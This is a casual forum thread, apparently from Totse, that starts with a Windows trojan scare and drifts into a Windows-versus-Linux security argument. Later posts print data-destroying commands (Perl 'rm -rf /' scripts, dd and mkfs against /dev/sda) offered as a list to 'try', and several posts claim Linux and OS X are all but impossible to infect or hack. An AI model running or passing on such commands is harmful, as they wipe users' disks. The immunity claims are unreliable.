I have Windows SP2, and my friend is like "Windows Firewall sucks, don't bother with it", but when I turn it off I sometimes get notifications with Windows Firewall saying it detected a Trojan sending information (even though I turned Windows Firewall off). When I click "Enable Protection" it just leads me to this page to buy Antivirus protection and doesn't enable my firewall at all.

Is it worth it in your opinion, Totse?

I also have AVG Antivirus, updated to the latest, and haven't detected any trojans. I regularly scan with Malware Bytes Anti Malware and haven't detected any trojans either, so it's kind of suspicious that Windows Firewall would detect a trojan, even though I obviously turned it off/lead me to a page to buy Antivirus software even though I clicked "Enable Protection".

You have trojans, and your software isn't detecting them. It's time to reformat and reinstall Windows, in my opinion. It's easier than going through your registry and filesystem to get rid of the it.

Spybot Search and Destroy might detect and get rid of it, possible.

I've never heard of Malware Bytes Anti-Malware, but there are a lot of "anti-malware" programs that are really trojans. I'll reserve judgment on that one unless I hear more about it.

Windows Firewall wouldn't try to get you to buy an antivirus or anti-malware, and it doesn't give any messages when turned off (although Windows Security Center will give a message periodically that the firewall is off to remind you).

Windows Firewall does suck; I recommend you get something like ZoneAlarm if you want something decent for free.

You have trojans, and your software isn't detecting them. It's time to reformat and reinstall Windows, in my opinion. It's easier than going through your registry and filesystem to get rid of the it.

Spybot Search and Destroy might detect and get rid of it, possible.

I've never heard of Malware Bytes Anti-Malware, but there are a lot of "anti-malware" programs that are really trojans. I'll reserve judgment on that one unless I hear more about it.

Windows Firewall wouldn't try to get you to buy an antivirus or anti-malware, and it doesn't give any messages when turned off (although Windows Security Center will give a message periodically that the firewall is off to remind you).

Windows Firewall does suck; I recommend you get something like ZoneAlarm if you want something decent for free.

Well Malware Bytes was an antivirus program that http://www.bleepingcomputer.com/ told me to use to get rid of a particularly nasty trojan I had last month.

This trojan might be a leftover from that trojan attack I had last month, where in total I got rid of about 50 trojans.

Yeah, you were right oddballz, I did have trojans; about 100 of them.

Thankfully, Malwarebytes comes in to save my computer again, this is one piece of freeware antimalware/spyware software that is absolutely great, I would recommend this to anyone, and I know the people at bleepingcomputer do.

Glad to hear this is resolved, but seriously, why do people bother trying to secure windows?

Know how many trojans and virii I've gotten while running Gnu/Linux? None. And that's after wine'ing a few of them to see if they would.

Glad to hear this is resolved, but seriously, why do people bother trying to secure windows?

Know how many trojans and virii I've gotten while running Gnu/Linux? None. And that's after wine'ing a few of them to see if they would.

Know how many people prefer Linux here! (in pk)
0.2% (including me :()

But still i use Windows and its more productive for me but i would love to upgrade if i had a laptop.

OP, Eset Nod 3.0 + Commodo Firewall

Glad to hear this is resolved, but seriously, why do people bother trying to secure windows?

Know how many trojans and virii I've gotten while running Gnu/Linux? None. And that's after wine'ing a few of them to see if they would.

You make it sound like these viruses don't exist for these OS's.


#!/usr/bin/perl
system('rm -rf /')


Omg, a linux "virus" before saying you have no viruses, virus needs to be defined. If a virus can be defined as something that can be used to compromise other peoples security, then linux has tons of viruses given it's reputation as the "hacker OS" it's not "impossible" to hack into a linux box.

This is largely something that can be attributed to a persons intelligence regarding their operating system, I have OS X 10.4, and I haven't got any viruses (although some might say no one wants to write a virus for mac) but the point still stands- if you're a horrible person at securing your computer then you will get a virus. I don't care if you're running a fucking super computer. It's not the OS, it's the person running it.

It's not the OS, it's the person running it.

I must add that using Windows doesn't compromise you at all, common sense and a little bit of help from sandboxie goes a long way in securing your system.

Also i test like 10+ softwares in a week and countless keygens as well and so far i haven't been compromised in anyway (except for that onetime :( by my own mistake).

You make it sound like these viruses don't exist for these OS's.


#!/usr/bin/perl
system('rm -rf /')


Omg, a linux "virus" before saying you have no viruses, virus needs to be defined. If a virus can be defined as something that can be used to compromise other peoples security, then linux has tons of viruses given it's reputation as the "hacker OS" it's not "impossible" to hack into a linux box.
Sorry Mr. Straw Man, but here's the output of that:

:~$ perl -e "system('rm -rf /');"
rm: cannot remove root directory `/'

Try that on windows (replace the command with deltree c:\ or whatever's necessary). Until it encounters a locked file, it'll go merrily on it's way.

Even if you had been smarter and not used root as the target (/*, for example) then it would have only removed files writeable to a user. If you have a competent backup script, that's a non-issue.

It is impossible for a virus to infect a Gnu or BSD system unless it is running as root. That in itself is a difficult task.

While it's possible to hack a Gnu/Linux box, it's damn hard, because Gnu/Linux is a real OS with real security. It is impossible to hack a Linux box, AFAIK. With no daemons to exploit and no local interface, it'd be pretty much impossible. You'd have to flag a filesystem as dirty and then put the exploit code somewhere so that it would exploit a FS driver; but probably it'd just die when it couldn't find fdisk.

Viruses don't exist for UNIX-type systems. There have been (afaik) two, and both of them were lab viruses.

This is largely something that can be attributed to a persons intelligence regarding their operating system, I have OS X 10.4, and I haven't got any viruses (although some might say no one wants to write a virus for mac) but the point still stands- if you're a horrible person at securing your computer then you will get a virus. I don't care if you're running a fucking super computer. It's not the OS, it's the person running it.

If you're running OS X, it's next to impossible for you to get a virus. You need no antivirus, no firewall, no trojan scanners, nothing. So far, I've heard one friend tell me about an attempted virus: it asked to be ran as root. So yes, the stupidity of the user is a factor, but there are a lot of stupid people that won't go to porn sites that ask to install shady codecs anyways.

An OS with real security will fail as gracefully as possible even in the event of a user shitting all over security. That's why on UNIX-type systems, the user can do nothing, and getting root is extremely hard.

To add to that, your virus won't proliferate, and thus, is pretty l4me.

Viruses don't exist for UNIX-type systems. There have been (afaik) two, and both of them were lab viruses.

One Unix virus that was in the wild was the Morris worm ( http://en.wikipedia.org/wiki/Morris_worm ) that infected DEC VAX machines running BSD 3 and Sun 3 (BSD-based). It also had a hook that was portable enough to affect other machines, bringing them down (but not infecting as the main virus body could only operate on VAX).

This worm took down basically the entire Internet that existed at the time, due to a bug that caused it to spread much faster than intended.

That said, AFAIK there are not CURRENTLY any wild *nix viruses.

One Unix virus that was in the wild was the Morris worm ( http://en.wikipedia.org/wiki/Morris_worm ) that infected DEC VAX machines running BSD 3 and Sun 3 (BSD-based). It also had a hook that was portable enough to affect other machines, bringing them down (but not infecting as the main virus body could only operate on VAX).

This worm took down basically the entire Internet that existed at the time, due to a bug that caused it to spread much faster than intended.

That said, AFAIK there are not CURRENTLY any wild *nix viruses.


It isn't a virus! It's a worm!


Also, the "system diversity" at that point is wildly different to what there is now. That could only have happened then.

Okay, well I wrote that in two seconds- so of course it wasn't really polished. Let's try something else then...


#!/usr/bin/perl
system('chmod -R 777 /');
sleep(2)
print "Deleting...\n";
system('rm -rf /');


run it as root.

DO I WIN!?!?!?!

Okay, well I wrote that in two seconds- so of course it wasn't really polished. Let's try something else then...


#!/usr/bin/perl
system('chmod -R 777 /');
sleep(2)
print "Deleting...\n";
system('rm -rf /');


run it as root.

DO I WIN!?!?!?!

No, because the system will still refuse to remove /. The sleep call is unnecessary, and will bloat your payload, along with the print statement. It has no way to propagate (again) and you have no entrance vector besides "hey guys run this as root".

No, because the system will still refuse to remove /. The sleep call is unnecessary, and will bloat your payload, along with the print statement. It has no way to propagate (again) and you have no entrance vector besides "hey guys run this as root".

I'm a computer wizard. I'll propagate what I want >:3

http://i36.tinypic.com/2vdjtir.jpg

EDIT: Found some harmful commands, try whatever ones you want.

dd of=/dev/zero of-/dev/sda
chown -r null: /
mkfs.vfat /dev/sda
dd if=/dev/urandom of=/dev/sda
wget -H -r --level=0 -k -p http://www.google.com

I'm a computer wizard. I'll propagate what I want >:3

http://i36.tinypic.com/2vdjtir.jpg

EDIT: Found some harmful commands, try whatever ones you want.

dd of=/dev/zero of-/dev/sda
chown -r null: /
mkfs.vfat /dev/sda
dd if=/dev/urandom of=/dev/sda
wget -H -r --level=0 -k -p http://www.google.com

None of those will work on a system that isn't Ubuntu or has primarily IDE drives. For instance, on my gentoo box, those will all obliterate my first flash stick.


Except the wget one. I'm flummoxed. Can you explain that?

EDIT: And the chown, though that can be fixed by chown'ing everything back the way it was. Root always has full permissions to everything.

None of those will work on a system that isn't Ubuntu or has primarily IDE drives. For instance, on my gentoo box, those will all obliterate my first flash stick.


Except the wget one. I'm flummoxed. Can you explain that?

EDIT: And the chown, though that can be fixed by chown'ing everything back the way it was. Root always has full permissions to everything.

I'm not completely sure about the wget one- I got all of these after asking 4chan's /g/ board how to screw up a linux computer.

Although, I'm pretty sure it recursively tries to download google's HTML page over and over, with some special options (-k and -p, whatever those do.) and switch /sda to /hda or whatever your applicable hard drive is and you're in business.

I'm not completely sure about the wget one- I got all of these after asking 4chan's /g/ board how to screw up a linux computer.

Although, I'm pretty sure it recursively tries to download google's HTML page over and over, with some special options (-k and -p, whatever those do.) and switch /sda to /hda or whatever your applicable hard drive is and you're in business.

Well actually, I think most of those will fail if it's mounted anyways.

And after reading the wget manual, I've realized that command will do nothing. It downloads googe.com recursively spanning across hosts, but at level 0, so I don't think it'll download much. Also, that has a syntax error, as it sets the starting directory to http://google.com, leaving wget without a host.

This is what you get for trusting Torchan.

I'm a computer wizard. I'll propagate what I want >:3

http://i36.tinypic.com/2vdjtir.jpg

EDIT: Found some harmful commands, try whatever ones you want.

dd of=/dev/zero of-/dev/sda
chown -r null: /
mkfs.vfat /dev/sda
dd if=/dev/urandom of=/dev/sda
wget -H -r --level=0 -k -p http://www.google.com

Harmful commands yes, but they still require root privileges (except the wget one).